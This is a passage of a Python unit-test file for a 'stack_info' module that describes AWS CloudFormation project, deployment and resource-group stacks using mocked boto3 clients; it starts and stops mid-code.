stack_description\n ]\n }\n\nMOCK_STACK_DESCRIPTION = {\n \"Parameters\": MOCK_PARAMETERS\n}\n\ndef make_random_parameter():\n id = str(random.randint(100000, 999999))\n return {\n 'ParameterKey': 'test-parameter-name-' + id,\n 'ParameterValue': 'test-parameter-value-' + id\n }\n\nMOCK_RESOURCE_DESCRIPTION = 'test-description'\n\nMOCK_RESOURCE_METADATA = {\n 'Test': 'Metadata'\n}\n\nMOCK_RESOURCE_DETAIL = {\n 'StackName': MOCK_STACK_NAME,\n 'StackId': MOCK_STACK_ARN,\n 'LogicalResourceId': MOCK_LOGICAL_RESOURCE_ID,\n 'PhysicalResourceId': MOCK_PHYSICAL_RESOURCE_ID,\n 'ResourceType': MOCK_RESOURCE_TYPE,\n 'LastUpdatedTimestamp': MOCK_RESOURCE_LAST_UPDATED_TIMESTAMP,\n 'ResourceStatus': MOCK_RESOURCE_STATUS,\n 'ResourceStatusReason': MOCK_RESOURCE_STATUS_REASON,\n 'Description': MOCK_RESOURCE_DESCRIPTION,\n 'Metadata': json.dumps(MOCK_RESOURCE_METADATA)\n}\n\nMOCK_RESOURCE_DETAIL_RESPONSE = {\n 'StackResourceDetail': MOCK_RESOURCE_DETAIL\n}\n\nclass Test_stack_info_get_stack_info(unittest.TestCase):\n\n def test_with_project_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_PROJECT))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.ProjectInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_PROJECT)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_deployment_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_DEPLOYMENT))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.DeploymentInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_deployment_access_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_DEPLOYMENT_ACCESS))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.DeploymentAccessInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT_ACCESS)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_resource_group_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_RESOURCE_GROUP))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.ResourceGroupInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_RESOURCE_GROUP)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', 
region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_no_stack_type(self):\n mock_response = make_describe_stacks_response(MOCK_STACK_DESCRIPTION)\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n with self.assertRaisesRegexp(ValidationError, MOCK_STACK_ARN):\n stack_info.get_stack_info(MOCK_STACK_ARN)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\nclass Test_stack_info_ParametersDict(unittest.TestCase):\n\n def test_getitem(self):\n target = stack_info.ParametersDict(MOCK_STACK_ARN)\n target['key1'] = 'value1'\n target['key2'] = 'value2'\n self.assertEquals(target['key1'], 'value1')\n with self.assertRaisesRegexp(ValidationError, 'not-present'):\n target['not-present']\n with self.assertRaisesRegexp(ValidationError, MOCK_STACK_ARN):\n target['not-present']\n\n\nclass Test_stack_info_StackInfo(unittest.TestCase):\n\n def test_stack_arn(self):\n expected_stack_arn = 'stack-arn'\n target = stack_info.StackInfo(expected_stack_arn, MOCK_STACK_TYPE)\n actual_stack_arn = target.stack_arn\n self.assertEquals(actual_stack_arn, expected_stack_arn)\n\n def test_stack_type(self):\n expected_stack_type = 'stack-type'\n target = stack_info.StackInfo(MOCK_STACK_ARN, expected_stack_type)\n actual_stack_type = target.stack_type\n self.assertEquals(actual_stack_type, expected_stack_type)\n\n def test_client_created(self):\n with mock.patch('boto3.client') as mock_client_factory:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_client = target.client\n actual_client_2 = target.client\n self.assertIsNotNone(actual_client)\n self.assertIs(actual_client, actual_client_2)\n mock_client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n\n def test_client_provided(self):\n expected_client = 'expected-client'\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE, client=expected_client)\n actual_client = target.client\n self.assertIs(actual_client, expected_client)\n\n def test_stack_name(self):\n expected_stack_name = MOCK_STACK_NAME\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_stack_name = target.stack_name\n self.assertEquals(actual_stack_name, expected_stack_name)\n\n def test_region(self):\n expected_region = MOCK_REGION\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_region = target.region\n self.assertEquals(actual_region, expected_region)\n\n def test_account_id(self):\n expected_account_id = MOCK_ACCOUNT_ID\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_account_id = target.account_id\n self.assertEquals(actual_account_id, expected_account_id)\n\n def test_resources(self):\n mock_resource_summary_1 = make_random_resource_summary()\n mock_resource_summary_2 = make_random_resource_summary()\n mock_resource_summary_list = [ mock_resource_summary_1, mock_resource_summary_2 ]\n mock_response = make_list_stack_resources_response(mock_resource_summary_list)\n mock_resources = [ 'mock-resource-info-1', 'mock-resource-info-2' ]\n with mock_aws.patch_client('cloudformation', 'list_stack_resources', return_value = mock_response) as mock_list_stack_resources:\n with mock.patch('stack_info.ResourceInfo', side_effect = mock_resources) as mock_ResourceInfo:\n target = stack_info.StackInfo(MOCK_STACK_ARN, 
MOCK_STACK_TYPE)\n actual_resources = target.resources\n actual_resources_2 = target.resources\n self.assertItemsEqual(actual_resources, mock_resources)\n self.assertIs(actual_resources, actual_resources_2)\n self.assertEquals(actual_resources.stack_arn, target.stack_arn)\n mock_list_stack_resources.assert_called_once_with(StackName = MOCK_STACK_ARN)\n mock_ResourceInfo.assert_any_call(MOCK_STACK_ARN, mock_resource_summary_1, target.client)\n mock_ResourceInfo.assert_any_call(MOCK_STACK_ARN, mock_resource_summary_2, target.client)\n\n def test_stack_description_provided(self):\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE, stack_description = MOCK_STACK_DESCRIPTION)\n actual_stack_description = target.stack_description\n self.assertEquals(actual_stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_stack_description_loaded(self):\n mock_response = make_describe_stacks_response(MOCK_STACK_DESCRIPTION)\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_stack_description = target.stack_description\n actual_stack_description_2 = target.stack_description\n self.assertEquals(actual_stack_description, MOCK_STACK_DESCRIPTION)\n self.assertIs(actual_stack_description, actual_stack_description_2)\n mock_describe_stacks.assert_called_once_with(StackName = MOCK_STACK_ARN)\n\n def test_parameters(self):\n key1 = 'key1'\n value1 = 'value1'\n key2 = 'key2'\n value2 = 'value2'\n mock_parameters = [ make_parameter(key1, value1), make_parameter(key2, value2) ]\n mock_stack_description = {\n \"Parameters\": mock_parameters\n }\n mock_parameters_dict = mock.MagicMock()\n with mock.patch('stack_info.StackInfo.stack_description', new_callable=mock.PropertyMock, return_value = mock_stack_description):\n with mock.patch('stack_info.ParametersDict', return_value = mock_parameters_dict) as mock_ParametersDict:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_parameters = target.parameters\n actual_parameters_2 = target.parameters\n self.assertIs(actual_parameters, mock_parameters_dict)\n self.assertIs(actual_parameters_2, mock_parameters_dict)\n mock_ParametersDict.assert_called_once_with(MOCK_STACK_ARN)\n mock_parameters_dict.__setitem__.assert_any_call(key1, value1)\n mock_parameters_dict.__setitem__.assert_any_call(key2, value2)\n\n\nclass Test_stack_info_ResourceInfoList(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n self.assertIs(target.stack_arn, MOCK_STACK_ARN)\n\n def test_find_resource_no_expected_type_not_optional_present(self):\n test_value = 'test-value'\n expected_resource = mock.MagicMock(test_attr = test_value)\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n actual_resource = target._ResourceInfoList__find_resource('test_attr', test_value, None, False)\n self.assertIs(actual_resource, expected_resource)\n\n def test_find_resource_no_expected_type_not_optional_not_present(self):\n test_value = 'test-value'\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n with self.assertRaisesRegexp(ValidationError, test_value):\n target._ResourceInfoList__find_resource('test_attr', 
test_value, None, False)\n\n def test_find_resource_no_expected_type_optional_not_present(self):\n test_value = 'test-value'\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n actual_resource = target._ResourceInfoList__find_resource('test_attr', test_value, None, True)\n self.assertIsNone(actual_resource)\n\n def test_find_resource_expected_type_not_optional_present(self):\n test_value = 'test-value'\n expected_type = 'test-type'\n expected_resource = mock.MagicMock(test_attr = test_value, type = expected_type)\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n actual_resource = target._ResourceInfoList__find_resource('test_attr', test_value, expected_type, False)\n self.assertIs(actual_resource, expected_resource)\n\n def test_find_resource_expected_type_not_optional_wrong_type(self):\n test_value = 'test-value'\n expected_type = 'test-type'\n expected_resource = mock.MagicMock(test_attr = test_value, type = 'unexpected-type')\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n with self.assertRaisesRegexp(ValidationError, expected_type):\n target._ResourceInfoList__find_resource('test_attr', test_value, expected_type, False)\n\n def test_get_by_logical_id_default(self):\n expected_resource = 'test-resource'\n logical_id = 'test-id'\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_logical_id(logical_id)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('logical_id', logical_id, None, False)\n\n def test_get_by_logical_id_with_args(self):\n expected_resource = 'test-resource'\n logical_id = 'test-id'\n expected_type = 'test-type'\n optional = True\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_logical_id(logical_id, expected_type = expected_type, optional = optional)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('logical_id', logical_id, expected_type, optional)\n\n def test_get_by_physical_id_default(self):\n expected_resource = 'test-resource'\n physical_id = 'test-id'\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_physical_id(physical_id)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('physical_id', physical_id, None, False)\n\n def test_get_by_physical_id_with_args(self):\n expected_resource = 'test-resource'\n physical_id = 'test-id'\n expected_type = 'test-type'\n optional = True\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = 
stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_physical_id(physical_id, expected_type = expected_type, optional = optional)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('physical_id', physical_id, expected_type, optional)\n\n def test_get_by_type(self):\n test_value = 'test-value'\n expected_type = 'test-type'\n expected_resource = mock.MagicMock(test_attr = test_value, type = expected_type)\n expected_list = [ expected_resource ]\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1', type = 'unexpected-type' ))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2', type = 'unexpected-type'))\n actual_list = target.get_by_type(expected_type)\n self.assertItemsEqual(actual_list, expected_list)\n\nclass Test_stack_info_ResourceInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, MOCK_CLIENT)\n self.assertIs(target.stack_arn, MOCK_STACK_ARN)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.physical_id, MOCK_PHYSICAL_RESOURCE_ID)\n self.assertIs(target.logical_id, MOCK_LOGICAL_RESOURCE_ID)\n self.assertIs(target.type, MOCK_RESOURCE_TYPE)\n self.assertIs(target.status, MOCK_RESOURCE_STATUS)\n self.assertIs(target.status_reason, MOCK_RESOURCE_STATUS_REASON)\n self.assertEquals(target.last_updated_time, dateutil.parser.parse(MOCK_RESOURCE_LAST_UPDATED_TIMESTAMP))\n\n def test_description(self):\n client = mock.MagicMock()\n client.describe_stack_resource.return_value = MOCK_RESOURCE_DETAIL_RESPONSE\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, client)\n actual_description_1 = target.description\n actual_description_2 = target.description\n self.assertIs(actual_description_1, MOCK_RESOURCE_DESCRIPTION)\n self.assertIs(actual_description_2, MOCK_RESOURCE_DESCRIPTION)\n client.describe_stack_resource.assert_called_once_with(StackName=MOCK_STACK_ARN, LogicalResourceId=MOCK_LOGICAL_RESOURCE_ID)\n\n def test_metadata(self):\n client = mock.MagicMock()\n client.describe_stack_resource.return_value = MOCK_RESOURCE_DETAIL_RESPONSE\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, client)\n actual_metadata_1 = target.metadata\n actual_metadata_2 = target.metadata\n self.assertEquals(actual_metadata_1, MOCK_RESOURCE_METADATA)\n self.assertEquals(actual_metadata_2, MOCK_RESOURCE_METADATA)\n client.describe_stack_resource.assert_called_once_with(StackName=MOCK_STACK_ARN, LogicalResourceId=MOCK_LOGICAL_RESOURCE_ID)\n\n def test_get_cloud_canvas_metadata_found(self):\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, MOCK_CLIENT)\n expected_value = 'value'\n mock_metadata = {\n 'CloudCanvas': {\n 'a': {\n 'b':{\n 'c': expected_value\n }\n }\n }\n }\n with mock.patch('stack_info.ResourceInfo.metadata', new_callable=mock.PropertyMock, return_value = mock_metadata):\n actual_value = target.get_cloud_canvas_metadata('a', 'b', 'c')\n self.assertEquals(actual_value, expected_value)\n\n\n def test_get_cloud_canvas_metadata_not_found(self):\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, MOCK_CLIENT)\n unexpected_value = 'value'\n mock_metadata = {\n 'CloudCanvas': {\n 'a': {\n 'b':{\n 'c': unexpected_value\n }\n }\n }\n }\n with mock.patch('stack_info.ResourceInfo.metadata', new_callable=mock.PropertyMock, return_value = mock_metadata):\n 
actual_value = target.get_cloud_canvas_metadata('a', 'x', 'c')\n self.assertIsNone(actual_value)\n\n\nclass Test_stack_info_ProjectInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_PROJECT)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_project_name(self):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN)\n self.assertEquals(target.project_name, MOCK_STACK_NAME)\n\n def test_deployments(self):\n mock_deployment_1_name = 'dep1'\n mock_deployment_2_name = 'dep2'\n mock_deployment_1_stack_arn = make_stack_arn(mock_deployment_1_name)\n mock_deployment_2_stack_arn = make_stack_arn(mock_deployment_2_name)\n mock_deployment_1_access_stack_arn = make_stack_arn(mock_deployment_1_name + 'access')\n mock_deployment_2_access_stack_arn = make_stack_arn(mock_deployment_2_name + 'access')\n mock_project_settings = {\n 'deployments': {\n mock_deployment_1_name: {\n 'DeploymentStackId': mock_deployment_1_stack_arn,\n 'DeploymentAccessStackId': mock_deployment_1_access_stack_arn\n },\n mock_deployment_2_name: {\n 'DeploymentStackId': mock_deployment_2_stack_arn,\n 'DeploymentAccessStackId': mock_deployment_2_access_stack_arn\n }, \n '*': {}\n }\n }\n mock_deployments = [ 'test-deployment-info-1', 'test-deployment-info-2' ]\n with mock.patch('stack_info.DeploymentInfo', side_effect = mock_deployments) as mock_DeploymentInfo:\n with mock.patch('stack_info.ProjectInfo.project_settings', new_callable=mock.PropertyMock, return_value = mock_project_settings):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN, client=MOCK_CLIENT)\n actual_deployments = target.deployments\n mock_DeploymentInfo.assert_any_call(mock_deployment_1_stack_arn, deployment_access_stack_arn = mock_deployment_1_access_stack_arn, client=MOCK_CLIENT, project_info = target)\n mock_DeploymentInfo.assert_any_call(mock_deployment_2_stack_arn, deployment_access_stack_arn = mock_deployment_2_access_stack_arn, client=MOCK_CLIENT, project_info = target)\n self.assertItemsEqual(actual_deployments, mock_deployments)\n\n def test_configuration_bucket(self):\n expected_configuration_bucket_id = 'test-id'\n mock_resource = mock.MagicMock(physical_id = expected_configuration_bucket_id)\n mock_resources = mock.MagicMock()\n mock_resources.get_by_logical_id.return_value = mock_resource\n with mock.patch('stack_info.ProjectInfo.resources', new = mock.PropertyMock( return_value = mock_resources )):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN)\n actual_configuration_bucket_id = target.configuration_bucket\n self.assertEquals(actual_configuration_bucket_id, expected_configuration_bucket_id)\n mock_resources.get_by_logical_id.assert_called_once_with('Configuration', expected_type='AWS::S3::Bucket')\n\n def test_project_settings(self):\n\n mock_project_settings = {\n 'Test': 'Setting'\n }\n\n mock_configuration_bucket_arn = 'mock-arn'\n\n mock_response = mock_aws.s3_get_object_response(json.dumps(mock_project_settings))\n\n with mock_aws.patch_client('s3', 'get_object', return_value = mock_response, reload = stack_info) as mock_get_object:\n with mock.patch('stack_info.ProjectInfo.configuration_bucket', new_callable=mock.PropertyMock, return_value = mock_configuration_bucket_arn):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN)\n actual_project_settings = target.project_settings\n 
self.assertEquals(actual_project_settings, mock_project_settings)\n mock_get_object.assert_called_once_with(Bucket=mock_configuration_bucket_arn, Key='project-settings.json')\n\n \nclass Test_stack_info_DeploymentInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_deployment_name(self):\n mock_deployment_name = 'test-deployment'\n mock_parameters = { 'DeploymentName' : mock_deployment_name }\n with mock.patch('stack_info.DeploymentInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n self.assertEquals(target.deployment_name, mock_deployment_name)\n\n def test_deployment_access_provided(self):\n mock_deployment_access = 'test-deployment-access'\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, deployment_access_info = mock_deployment_access, client=MOCK_CLIENT)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n\n def test_deployment_access_arn_provided(self):\n mock_deployment_access = 'test-deployment-access'\n with mock.patch('stack_info.DeploymentAccessInfo', return_value = mock_deployment_access) as mock_DeploymentAccessInfo:\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, deployment_access_stack_arn = mock_deployment_access_stack_arn, client=MOCK_CLIENT)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n mock_DeploymentAccessInfo.assert_called_once_with(mock_deployment_access_stack_arn, deployment_info = target, client=MOCK_CLIENT)\n\n def test_deployment_access_arn_discovered(self):\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n mock_describe_stacks_result = {\n 'Stacks': [\n {\n 'StackId': mock_deployment_access_stack_arn,\n 'StackStatus': 'UPDATE_COMPLETE'\n }\n ]\n }\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n mock_deployment_access = 'test-deployment-access'\n with mock.patch('stack_info.DeploymentAccessInfo', return_value = mock_deployment_access) as mock_DeploymentAccessInfo:\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n mock_DeploymentAccessInfo.assert_called_once_with(mock_deployment_access_stack_arn, deployment_info = target, client=target.client)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_access_denied(self):\n mock_describe_stacks_result = ClientError(\n {\n 'Error': {\n 'Code': 'ValidationError'\n }\n },\n 'describe-stacks'\n )\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n with mock_aws.patch_client('cloudformation', 'describe_stacks', side_effect = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n 
self.assertIsNone(actual_deployment_access)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_not_access_denied(self):\n mock_error_code = 'SomeErrorCode'\n mock_describe_stacks_result = ClientError(\n {\n 'Error': {\n 'Code': mock_error_code\n }\n },\n 'describe-stacks'\n )\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n with mock_aws.patch_client('cloudformation','describe_stacks', side_effect = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n with self.assertRaisesRegexp(ClientError, mock_error_code):\n actual_deployment_access = target.deployment_access\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_deleted(self):\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n mock_describe_stacks_result = {\n 'Stacks': [\n {\n 'StackId': 'wrong-stack-id',\n 'StackStatus': 'DELETE_COMPLETE'\n },\n {\n 'StackId': mock_deployment_access_stack_arn,\n 'StackStatus': 'UPDATE_COMPLETE'\n }\n ]\n }\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n mock_deployment_access = 'test-deployment-access'\n with mock.patch('stack_info.DeploymentAccessInfo', return_value = mock_deployment_access) as mock_DeploymentAccessInfo:\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n mock_DeploymentAccessInfo.assert_called_once_with(mock_deployment_access_stack_arn, deployment_info = target, client=target.client)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_deleted_only(self):\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n mock_describe_stacks_result = {\n 'Stacks': [\n {\n 'StackId': 'wrong-stack-id',\n 'StackStatus': 'DELETE_COMPLETE'\n },\n {\n 'StackId': mock_deployment_access_stack_arn,\n 'StackStatus': 'DELETE_COMPLETE'\n }\n ]\n }\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIsNone(actual_deployment_access)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_project_provided(self):\n mock_project_info = 'test-project-info'\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, project_info=mock_project_info)\n self.assertIs(target.project, mock_project_info)\n\n def test_project_discovered(self):\n mock_project_stack_id = 'test-project-stack-id'\n mock_project = 'test-project-info'\n mock_parameters = { 'ProjectStackId' : mock_project_stack_id }\n with mock.patch('stack_info.ProjectInfo', return_value = mock_project) as mock_ProjectInfo:\n with mock.patch('stack_info.DeploymentInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, client=MOCK_CLIENT)\n actual_project = target.project\n actual_project_2 = target.project\n self.assertIs(actual_project, 
mock_project)\n self.assertIs(actual_project_2, mock_project)\n mock_ProjectInfo.assert_called_once_with(mock_project_stack_id, client=MOCK_CLIENT)\n\n def test_resource_groups(self):\n mock_physical_resource_id_1 = 'mock_physical_resource_id_1'\n mock_physical_resource_id_2 = 'mock_physical_resource_id_2'\n mock_logical_resource_id_1 = 'mock_logical_id_1'\n mock_logical_resource_id_2 = 'mock_logical_id_2'\n mock_resource_1 = mock.MagicMock()\n mock_resource_1.physical_id = mock_physical_resource_id_1\n mock_resource_1.logical_id = mock_logical_resource_id_1\n mock_resource_1.type = 'AWS::CloudFormation::Stack'\n mock_resource_2 = mock.MagicMock()\n mock_resource_2.physical_id = mock_physical_resource_id_2\n mock_resource_2.logical_id = mock_logical_resource_id_2\n mock_resource_2.type = 'AWS::CloudFormation::Stack'\n mock_resource_3 = mock.MagicMock()\n mock_resource_3.physical_id = 'not-used'\n mock_resource_3.logical_id = 'not-used'\n mock_resource_3.type = 'not-a-stack'\n mock_resource_4 = mock.MagicMock()\n mock_resource_4.physical_id = 'not-used'\n mock_resource_4.logical_id = 'not-used'\n mock_resource_4.type = 'not-a-stack'\n mock_resources = [ \n mock_resource_3,\n mock_resource_1,\n mock_resource_4,\n mock_resource_2\n ]\n mock_resource_group_1 = 'test-resource-group-1'\n mock_resource_group_2 = 'test-resource-group-2'\n mock_resource_groups = [ mock_resource_group_1, mock_resource_group_2 ]\n with mock.patch('stack_info.ResourceGroupInfo', side_effect = mock_resource_groups) as mock_ResourceGroupInfo:\n with mock.patch('stack_info.DeploymentInfo.resources', new_callable=mock.PropertyMock, return_value=mock_resources):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, client=MOCK_CLIENT)\n actual_resource_groups = target.resource_groups\n self.assertItemsEqual(actual_resource_groups, mock_resource_groups)\n mock_ResourceGroupInfo.assert_any_call(mock_physical_resource_id_1, resource_group_name=mock_logical_resource_id_1, client=target.client, deployment_info=target)\n mock_ResourceGroupInfo.assert_any_call(mock_physical_resource_id_2, resource_group_name=mock_logical_resource_id_2, client=target.client, deployment_info=target)\n\n\nclass Test_stack_info_DeploymentAccessInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.DeploymentAccessInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT_ACCESS)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_deployment_provided(self):\n mock_deployment = 'test-deployment-stack-info'\n target = stack_info.DeploymentAccessInfo(MOCK_STACK_ARN, deployment_info = mock_deployment)\n self.assertEquals(target.deployment, mock_deployment)\n\n def test_deployment_discovered(self):\n mock_deployment_stack_arn = 'test-deployment-stack-arn'\n mock_client = 'mock_client'\n mock_deployment = 'test-deployment-info'\n mock_parameters = { 'DeploymentStackArn': mock_deployment_stack_arn }\n with 